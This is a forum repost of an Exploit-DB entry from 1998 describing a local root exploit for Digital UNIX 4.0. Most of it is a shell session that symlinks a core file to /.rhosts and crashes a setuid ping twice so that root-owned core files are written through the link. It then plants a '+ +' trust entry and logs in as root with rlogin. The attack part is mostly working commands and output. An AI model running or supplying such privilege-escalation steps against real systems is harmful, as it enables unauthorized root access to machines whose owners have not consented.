Exploit Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19068
Проверка EDB
  1. Пройдено
Автор
RU5TY & SOREN
Тип уязвимости
LOCAL
Платформа
UNIX
CVE
null
Дата публикации
1998-04-06
Код:
source: https://www.securityfocus.com/bid/74/info

Digital UNIX 4.0 will follow symlinks while writting core files if two setuid programs dump core in sucession. The core file is owned by root but with the user's groud id. The core file permissions are 0600. This can be used to create root owned file anywhere in the filesystem.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
 
Источник
www.exploit-db.com

Похожие темы